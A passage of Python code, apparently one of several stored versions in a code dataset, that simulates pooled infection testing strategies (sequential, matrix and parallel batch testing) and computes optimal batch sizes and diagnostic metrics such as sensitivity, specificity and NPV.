n_initial_guess)\n floor, ceil = np.floor(sol_float), np.ceil(sol_float)\n func = lambda batch_size: 1 / batch_size + 1 - typeII_error - (1 -\n typeII_error - typeI_error) * (1 - prevalence_rate) ** batch_size\n if func(floor) < func(ceil):\n temp = int(floor)\n else:\n temp = int(ceil)\n if temp <= batch_limit:\n return temp\n else:\n return int(batch_limit)\n\n\ndef neg_pos_batch_split(subject_array, batch_size, typeII_error, typeI_error):\n \"\"\"\n A function gives a list of sujects on the negative batch(es),\n a list of subjects on the postive batch(es) and the test-kit \n consumption given the probability of type II error, the \n probability of Type I error.\n \n Input:\n subject_array (Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n \n\n Output:\n neg_batch (Numpy Array): an array of subjects on the negative batch(es)\n pos_batch (Numpy Array): an array of subjects on the postive batch(es)\n test_consum (int): the number of test-kit consumptions\n \n \"\"\"\n neg_batch = []\n pos_batch = []\n test_consum = np.ceil(len(subject_array) / batch_size)\n random_table = np.random.uniform(0, 1, int(test_consum))\n i = 0\n for temp_batch in np.array_split(subject_array, test_consum):\n if 1 in temp_batch[:, 1]:\n if random_table[i] > typeII_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n elif random_table[i] > typeI_error:\n neg_batch.append(temp_batch)\n else:\n pos_batch.append(temp_batch)\n i += 1\n neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([\n ])\n pos_batch 
= np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([\n ])\n return neg_batch, pos_batch, test_consum\n\n\ndef helpfunction(subject_array, p, batch_size, typeII_error, typeI_error,\n batch_limit):\n \"\"\"\n The helpfunction is a handy function to give the list of subjects on the\n negative batch(es), the list of subjects on the postive batch(es), the \n test-kit consumption, the infection rate on the negative batches, the \n infection rate on the positive batches, the optimal batch size for\n negative batches and the optimal batch size for positive batches.\n\n Input: \n subject_array (Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n p (float): Infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n batch_limit (int): batch size upper limit\n\n Output:\n temp0 (Numpy Array): an array of subjects on the negative batch(es)\n temp1 (Numpy Array): an array of subjects on the postive batch(es)\n temp_con (int): the number of test-kit consumptions\n p0 (float): the infection rate on the negative batches\n p1 (float): the infection rate on the positive batches\n n0 (float): the optimal batch size for the negative batches\n n1 (float): the optimal batch size for the positive batches\n \"\"\"\n batch_size = min(batch_size, batch_limit)\n p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error,\n typeI_error)\n p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error,\n typeI_error)\n n0 = one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)\n n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)\n if subject_array == np.array([]):\n return np.array([]), np.array([]), p0, p1, n0, n1\n temp0, temp1, temp_con = neg_pos_batch_split(subject_array, batch_size,\n typeII_error, typeI_error)\n return temp0, temp1, temp_con, p0, p1, n0, n1\n\n\ndef seq_test(subject_array, stop_rule, p, batch_size, typeII_error,\n typeI_error, repeat=1, prob_threshold=1, seq=True, batch_limit=32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. 
The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error,\n batch_limit=batch_limit)\n temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[\n 'PB_Num'], 'p': p0, 'batch_size': n0}\n temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[\n 'PB_Num'] + 1, 'p': p1, 'batch_size': n1}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con\n\n\n<mask token>\n\n\ndef specificity_score(y_true, y_pred):\n \"\"\"\n A function provides specificty given the prediction and the truth \n \"\"\"\n tn, fp, _, _ = confusion_matrix(y_true=y_true, y_pred=y_pred).ravel()\n return tn / (tn + fp)\n\n\n@jit(parallel=True)\ndef data_gen(size, p):\n \"\"\"\n data_gen provides a faster way to generate a random population with\n infection rate p.\n Input:\n size (int): the size of population\n p (float): the infection rate\n Output:\n test_array (array): the first column is for id and the second column\n is the condition, where 1 stands for infection and 0 stands for uninfection\n\n \"\"\"\n random_table = np.random.binomial(size=size, p=p, n=1)\n test_array = np.zeros((size, 2), dtype=int)\n for i in range(size):\n test_array[i, 0] = i\n test_array[i, 1] = random_table[i]\n return test_array\n\n\ndef test_result(data, seq_test, **kwargs):\n \"\"\"\n a helper function provides convenient results for a given test method with its **kwargs\n\n Input:\n data (array or list of arrays)\n seq_test (test_method object): could be seq_test, matrix_test and other test_method objects\n Output:\n result (DataFrame): a dataframe contains important evaluation metrics for the test method \n \"\"\"\n if isinstance(data, list) == False:\n pred, consum, ind_con = seq_test(data, **kwargs)\n result = {'acc': np.mean(pred[:, 1] == data[:, 1]), 'sens':\n recall_score(data[:, 1], pred[:, 1]), 'spec': specificity_score\n (data[:, 1], pred[:, 1]), 'PPV': precision_score(data[:, 1],\n pred[:, 1]), 'NPV': npv_score(data[:, 1], pred[:, 1]),\n 'test_consum': consum, 'ind_consum': ind_con, 'batch_consum': \n consum - 
ind_con}\n return result\n else:\n length = len(data)\n acc = np.zeros(length)\n sens = np.zeros(length)\n spec = np.zeros(length)\n ppv = np.zeros(length)\n npv = np.zeros(length)\n test_consum = np.zeros(length)\n ind_consum = np.zeros(length)\n batch_consum = np.zeros(length)\n for i in range(length):\n pred, consum, ind_con = seq_test(data[i], **kwargs)\n acc[i] = np.mean(pred[:, 1] == data[i][:, 1])\n sens[i] = recall_score(data[i][:, 1], pred[:, 1])\n spec[i] = specificity_score(data[i][:, 1], pred[:, 1])\n ppv[i] = precision_score(data[i][:, 1], pred[:, 1])\n npv[i] = npv_score(data[i][:, 1], pred[:, 1])\n test_consum[i] = consum\n ind_consum[i] = ind_con\n batch_consum[i] = consum - ind_con\n result = {'acc': acc, 'sens': sens, 'spec': spec, 'PPV': ppv, 'NPV':\n npv, 'test_consum': test_consum, 'ind_consum': ind_consum,\n 'batch_consum': batch_consum}\n return pd.DataFrame(result)\n\n\ndef matrix_test(subject_array, side_length, typeII_error, typeI_error,\n sq_repeat=1, ind_repeat=1, seq=True):\n \"\"\"\n This function provides the matrix testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n side_length (int): the side length of the matrix testing\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n sq_repeat (int): the number of parallel testing for the column/row batch testing\n ind_repeat (int): the number of potential individual testing for the positive crossings\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n matrix_test_num = len(subject_array) // side_length ** 2\n matrix_test_array = subject_array[0:matrix_test_num * side_length ** 2, :]\n ind_test_array = subject_array[matrix_test_num * side_length ** 2:, :]\n ind_idx = []\n for temp_batch in np.array_split(matrix_test_array, matrix_test_num):\n temp_batch = temp_batch.reshape(side_length, side_length, 2)\n temp_row = []\n temp_col = []\n random_num_row = np.random.uniform(0, 1, sq_repeat)\n random_num_col = np.random.uniform(0, 1, sq_repeat)\n for i in range(side_length):\n if 1 in temp_batch[i, :, 1]:\n if max(random_num_row) > typeII_error:\n temp_row.append(temp_batch[i, :, 0])\n elif min(random_num_row) < typeI_error:\n temp_row.append(temp_batch[i, :, 0])\n if 1 in temp_batch[:, i, 1]:\n if max(random_num_col) > typeII_error:\n temp_col.append(temp_batch[:, i, 0])\n elif min(random_num_col) < typeI_error:\n temp_col.append(temp_batch[:, i, 0])\n ind_idx.append(np.intersect1d(temp_row, temp_col))\n ind_idx = np.concatenate(ind_idx)\n ind_idx = ind_idx.astype('int')\n if len(ind_idx) == 0:\n neg_array = matrix_test_array\n else:\n mask = np.zeros(subject_array.shape[0], dtype=bool)\n mask[ind_idx] = True\n mask[matrix_test_num * side_length ** 2:] = True\n ind_test_array = subject_array[mask, :]\n neg_array = subject_array[~mask, :]\n neg_array[:, 1] = 0\n ind_test, ind_con = conventional_test(ind_test_array, typeII_error,\n typeI_error, repeat=ind_repeat, seq=seq)\n batch_test_num = matrix_test_num * 2 * side_length * sq_repeat\n result = np.concatenate((neg_array, 
ind_test))\n result = result[result[:, 0].argsort()]\n return result, batch_test_num + ind_con, ind_con\n\n\ndef parallel_batch_testing(subject_array, batch_size, typeII_error,\n typeI_error, parallel_num, ind_repeat, seq):\n \"\"\"\n This function provides the parallel batch testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n parallel_num (int): the number of parallel testing for the batch testing\n ind_repeat (int): the number of potential individual testing for the positive batches\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n neg_batch = []\n pos_batch = []\n batch_consum = np.ceil(len(subject_array) / batch_size) * parallel_num\n for temp_batch in np.array_split(subject_array, np.ceil(len(\n subject_array) / batch_size)):\n random_table = np.random.uniform(0, 1, (1, parallel_num))\n if 1 in temp_batch[:, 1]:\n if random_table.max() > typeII_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n elif random_table.min() < typeI_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([\n ])\n pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([\n ])\n neg_batch[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_batch,\n typeII_error, typeI_error, repeat=ind_repeat, seq=seq)\n result = np.concatenate((individual_test, neg_batch))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, batch_consum + individual_con, individual_con\n\n\ndef fixed_batch_seq_test(subject_array, stop_rule, p, batch_size,\n typeII_error, typeI_error, repeat, prob_threshold=0.3, seq=True):\n \"\"\"\n This function provides the parallel batch testing results for a given subject array.\n\n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of positive batches to enter the individual testing phase\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of potential individual testing for the positive crossings\n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. 
The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error)\n temp0 = {'data': np.random.permutation(temp0), 'NB_Num': i[\n 'NB_Num'] + 1, 'PB_Num': i['PB_Num'], 'p': p0, 'batch_size':\n batch_size}\n temp1 = {'data': np.random.permutation(temp1), 'NB_Num': i[\n 'NB_Num'], 'PB_Num': i['PB_Num'] + 1, 'p': p1, 'batch_size':\n batch_size}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con\n\n\ndef name_fun(n):\n \"\"\"\n input: stopping rule\n output: finish nodes\n \"\"\"\n output = []\n temp = ['']\n for i in range(2 * n - 1):\n temp_cur = []\n for j in temp:\n candidate_pos = j + '+'\n candidate_neg = j + '-'\n if str.count(candidate_pos, '+') >= n:\n output.append(candidate_pos)\n else:\n temp_cur.append(candidate_pos)\n if str.count(candidate_neg, '-') >= n:\n output.append(candidate_neg)\n else:\n temp_cur.append(candidate_neg)\n temp = temp_cur\n neg_symbol = [x for x in output if str.count(x, '-') == n]\n pos_symbol = [x for x in output if str.count(x, '+') == n]\n return output, neg_symbol, pos_symbol\n\n\ndef seq_test_with_node(subject_array, stop_rule, p, batch_size,\n typeII_error, typeI_error, repeat=1, prob_threshold=1, seq=True,\n batch_limit=32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate 
of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = []\n pos_list = []\n batch_num_list = []\n consum = 0\n temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,\n 'batch_size': batch_size, 'node': ''}\n temp_list.append(temp)\n new_list = []\n neg_array = []\n neg_node = []\n pos_node = []\n pos_array = []\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],\n i['p'], i['batch_size'], typeII_error, typeI_error,\n batch_limit=batch_limit)\n temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[\n 'PB_Num'], 'p': p0, 'batch_size': n0, 'node': i['node'] + '-'}\n temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[\n 'PB_Num'] + 1, 'p': p1, 'batch_size': n1, 'node': i['node'] +\n '+'}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n if len(temp1['data']) > 0:\n if temp1['PB_Num'] >= stop_rule or temp1['p'\n ] >= prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con\n batch_num_list.append(consum)\n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n temp = [[x, j['node']] for x in j['data'][:, 0]]\n neg_node.append(temp)\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n temp = [[x, k['node']] for x in k['data'][:, 0]]\n pos_node.append(temp)\n pos_array = np.concatenate(pos_array)\n neg_array[:, 1] = 0\n individual_test, individual_con = conventional_test(pos_array,\n typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n pos_node.extend(neg_node)\n node = pos_node\n node = sum(node, [])\n node.sort()\n node = [x[1] for x in node]\n result = result[result[:, 0].argsort()]\n result = result.astype('int64')\n return result, consum, individual_con, node, batch_num_list\n",
"step-5": "import numpy as np\nimport pandas as pd\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import precision_score, recall_score, f1_score\nfrom scipy.optimize import fsolve\nimport numba\nfrom numba import njit,jit\n#\n@jit(parallel = True)\ndef conventional_test(subject_array, typeII_error, typeI_error, repeat = 1,\nseq = True):\n\n\n \"\"\"\n A function gives the test results to a subject array given the probability of\n type II error, the probability of Type I error, and the number of repeatition,\n and setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n seq (boolean): True stands for sequential testing. The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n\n Output:\n test_result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n \"\"\"\n\n\n # Sequential Testing\n if seq == True:\n consum = 0\n \n test_result = np.zeros(subject_array.shape, dtype = int)\n \n random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat))\n for i in range(len(subject_array)):\n temp = 0\n j = 0\n subject = subject_array[i,1]\n while j < repeat and temp == 0:\n random_num = random_table[i, j]\n consum += 1\n if subject == 1:\n temp = 1 if random_num > typeII_error else 0\n else:\n temp = 1 if random_num < typeI_error else 0\n j += 1\n \n\n test_result[i,0] = subject_array[i,0]\n test_result[i,1] = temp\n \n return test_result, consum\n \n # Simultanous Testing \n else: \n test_result = np.zeros(subject_array.shape, dtype = int)\n \n\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat))\n for i in range(len(subject_array)):\n temp = 0\n for j in range(repeat):\n temp_random = random_table[i, j]\n if subject_array[i, 1] == 1:\n temp_1 = 1 if temp_random > typeII_error else 0\n elif subject_array[i, 1] == 0:\n temp_1 = 1 if temp_random < typeI_error else 0\n temp += temp_1\n temp = 1 if temp >= repeat/2 else 0\n test_result[i,0] = subject_array[i,0]\n test_result[i,1] = temp\n \n return test_result, len(subject_array)*repeat\n\n\n@njit(parallel = True)\ndef parallel_test(subject_array, typeII_error, typeI_error, num):\n test_result = np.zeros(subject_array.shape, dtype = int)\n random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))\n for i in range(len(subject_array)):\n subject = subject_array[i, 1]\n if subject == 1:\n temp = 1 if max(random_table[i,:]) > typeII_error else 0\n elif subject == 0:\n temp = 1 if min(random_table[i,:]) < typeI_error else 0\n\n test_result[i,0] = subject_array[i,0]\n test_result[i,1] = temp\n\n return test_result,len(subject_array)*num,len(subject_array)*num\n\n\ndef infection_rate_on_negative_batch(p,batch_size,typeII_error, typeI_error):\n \"\"\"\n \n Given infection rate, batch size, prob of type II error and prob of type I error, this\n function gives the infection rate on the negative batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the 
negative batch\n\n\n\n \"\"\"\n q = 1-p\n r = typeII_error * (1 - q ** batch_size)/((1 - typeI_error) * q ** batch_size + typeII_error *(1 - q**batch_size))\n return p*r/(1-q**batch_size)\n\n\ndef infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):\n \n \"\"\"\n Given infection rate, batch size, prob of type II error and prob of type I error, this\n function gives the infection rate on the positive batch.\n \n Input:\n p (float): the infection rate\n batch_size (int): the batch size\n typeII_error (float): the prob of type II error\n typeI_error (float): the prob of type I error\n\n Output:\n (float): the infection rate on the positive batch\n \"\"\" \n\n q = 1-p\n r = (1 - typeII_error) * (1 - q ** batch_size)/(typeI_error * q ** batch_size + (1 - typeII_error) * (1 - q **batch_size))\n return p*r/(1 - q** batch_size)\n\n\ndef one_batch_test_solver(prevalence_rate,typeII_error, typeI_error,n_initial_guess = 2):\n \n \"\"\"\n A function gives (float) the best batch size for one batch test given the infection rate\n \n Inputs:\n prevalence_rate(float): infection rate\n typeII_error(float): the prob of type II error\n typeI_error(float): the prob of type I error\n n_initial_guess(float): the initial guess \n\n Output:\n (float): the optimal batch size\n\n \"\"\"\n q = 1- prevalence_rate # To consistent with the notation of our document\n func = lambda n : n*q**(n/2) - (-(1-typeII_error - typeI_error)*np.log(q))**(-1/2)\n # print(func(n_initial_guess))\n n_solution = fsolve(func, n_initial_guess)\n \n return float(n_solution)\n\ndef one_batch_test_int_solver(prevalence_rate,typeII_error, typeI_error,batch_limit,n_initial_guess = 2):\n \"\"\"\n A function gives (int) the best batch size for one batch test given the infection rate\n \n Inputs:\n prevalence_rate(float): infection rate\n n_initial_guess(float): the initial guess \n typeII_error(float): the prob of type II error\n typeI_error(float): the prob of type I error\n n_initial_guess:\n batch_limit (int): the upper limit of batch size\n\n Output:\n (int): the optimal batch size\n \"\"\"\n\n \n sol_float = one_batch_test_solver(prevalence_rate,typeII_error, typeI_error, n_initial_guess)\n floor, ceil = np.floor(sol_float), np.ceil(sol_float)\n func = lambda batch_size: 1/batch_size + 1 - typeII_error -(1 - typeII_error - typeI_error)*(1-prevalence_rate)**batch_size\n if func(floor) < func(ceil):\n temp = int(floor)\n else:\n temp = int(ceil)\n if temp <= batch_limit:\n return temp\n else:\n return int(batch_limit)\n\n\ndef neg_pos_batch_split(subject_array, batch_size, typeII_error, typeI_error):\n \"\"\"\n A function gives a list of sujects on the negative batch(es),\n a list of subjects on the postive batch(es) and the test-kit \n consumption given the probability of type II error, the \n probability of Type I error.\n \n Input:\n subject_array (Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n \n\n Output:\n neg_batch (Numpy Array): an array of subjects on the negative batch(es)\n pos_batch (Numpy Array): an array of subjects on the postive batch(es)\n test_consum (int): the number of test-kit consumptions\n \n \"\"\"\n neg_batch = []\n pos_batch = []\n test_consum = np.ceil(len(subject_array)/batch_size)\n random_table = np.random.uniform(0, 1, int(test_consum))\n i = 0\n for temp_batch in 
np.array_split(subject_array, test_consum):\n if 1 in (temp_batch[:,1]):\n if random_table[i] > typeII_error:\n pos_batch.append(temp_batch)\n else:\n neg_batch.append(temp_batch)\n else:\n if random_table[i] > typeI_error:\n neg_batch.append(temp_batch)\n else:\n pos_batch.append(temp_batch)\n i += 1\n neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([])\n pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([])\n return (neg_batch, pos_batch, test_consum)\n\ndef helpfunction(subject_array, p, batch_size ,typeII_error, typeI_error, batch_limit):\n \n \"\"\"\n The helpfunction is a handy function to give the list of subjects on the\n negative batch(es), the list of subjects on the postive batch(es), the \n test-kit consumption, the infection rate on the negative batches, the \n infection rate on the positive batches, the optimal batch size for\n negative batches and the optimal batch size for positive batches.\n\n Input: \n subject_array (Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n p (float): Infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n batch_limit (int): batch size upper limit\n\n Output:\n temp0 (Numpy Array): an array of subjects on the negative batch(es)\n temp1 (Numpy Array): an array of subjects on the postive batch(es)\n temp_con (int): the number of test-kit consumptions\n p0 (float): the infection rate on the negative batches\n p1 (float): the infection rate on the positive batches\n n0 (float): the optimal batch size for the negative batches\n n1 (float): the optimal batch size for the positive batches\n \"\"\"\n batch_size = min(batch_size, batch_limit)\n\n p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error)\n p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error)\n n0= one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)\n n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)\n if subject_array == np.array([]):\n return (np.array([]), np.array([]), p0, p1, n0, n1)\n temp0, temp1, temp_con = neg_pos_batch_split(subject_array,batch_size,typeII_error, typeI_error)\n return(temp0, temp1, temp_con, p0, p1, n0, n1)\n\ndef seq_test(subject_array,stop_rule,p, batch_size, typeII_error, typeI_error, repeat = 1, \nprob_threshold = 1, seq = True, batch_limit = 32):\n \"\"\"\n A function gives the test results to a subject array and the total number of \n test-kit consumption and the individual testing number given the subject array,\n the stop rule, the batch size, the probability of type II error, the probability of \n Type I error, and the number of repeatition, the probability threshold, and \n setting of sequence testing or not.\n \n Input:\n subject_array(Numpy Array): an array contains subject id and subject's\n condition (1 stands for infection and 0 stands for uninfection)\n stop_rule (int): the number of postive batches to enter individual testing\n p (float): infection rate\n batch_size (int): batch size\n typeII_error (float): probability of type II error \n typeI_error (float): probability of type I error\n repeat (int): the number of repetition \n prob_threshold (float): if the infection rate of a batch is beyond prob_threshold, \n the subjects on that batch will enter individual testing phase\n seq (boolean): True stands for sequential testing. 
The test will end\n when the test result is positive or run up the number of repetition.\n False stands for simutanlous testing with majority voting.\n batch_limit (int):\n\n Output:\n result (Numpy Array): an array contains subjects' id and test results\n consum (int): the total test consumption\n individual_con (int): the test consumption for individual testings\n\n \"\"\"\n temp_list = []\n neg_list = [] #renamed to negativeInfoList\n pos_list = [] #renamed to positiveInfoList\n consum = 0\n temp = {'data': subject_array,\n 'NB_Num': 0,\n 'PB_Num': 0,\n 'p': p,\n 'batch_size': batch_size}\n temp_list.append(temp)\n new_list = []\n neg_array = [] #renamed to negativeBatches\n pos_array = [] #renamed to positiveBatches\n while len(temp_list) > 0:\n for i in temp_list:\n temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'], i['p'], i['batch_size'],\n typeII_error, typeI_error, \n batch_limit = batch_limit)\n temp0 = {'data': temp0,\n 'NB_Num': i['NB_Num'] + 1,\n 'PB_Num': i['PB_Num'],\n 'p': p0,\n 'batch_size': n0}\n temp1 = {'data': temp1,\n 'NB_Num': i['NB_Num'],\n 'PB_Num': i['PB_Num'] + 1,\n 'p': p1,\n 'batch_size': n1}\n if len(temp0['data']) > 0:\n if temp0['NB_Num'] >= stop_rule:\n neg_list.append(temp0)\n else:\n new_list.append(temp0)\n \n if len(temp1['data'])>0:\n if temp1['PB_Num'] >= stop_rule or temp1['p']>=prob_threshold:\n pos_list.append(temp1)\n else:\n new_list.append(temp1)\n consum += temp_con \n temp_list = new_list\n new_list = []\n for j in neg_list:\n neg_array.append(j['data'])\n neg_array = np.concatenate(neg_array)\n for k in pos_list:\n pos_array.append(k['data'])\n pos_array = np.concatenate(pos_array)\n \n neg_array[:,1] = 0\n individual_test, individual_con = conventional_test(pos_array, typeII_error, typeI_error, repeat, seq)\n pos_array = individual_test\n consum += individual_con\n result = np.concatenate((pos_array, neg_array))\n result = result[result[:,0].argsort()]\n result = result.astype('int64')\n return (result, consum, individual_con)\n\ndef npv_score(y_true, y_pred):\n \"\"\"\n A function provides npv given the prediction and the truth \n \"\"\"\n tn, _, fn, _ = confusion_matrix(y_true = y_true,\n y_pred = y_pred).ravel()\n return tn/(tn + fn)\n\ndef specificity_score(y_true, y_pred):\n \"\"\"\n A function provides specificty given the prediction and the truth \n \"\"\"\n tn, fp, _, _ = confusion_matrix(y_true = y_true,\n y_pred = y_pred).ravel()\n return tn/(tn + fp)\n\n@jit(parallel = True)\ndef data_gen(size, p):\n \"\"\"\n data_gen provides a faster way to generate a random population with\n infection rate p.\n Input:\n size (int): the size of population\n p (float): the infection rate\n Output:\n test_array (array): the first column is for 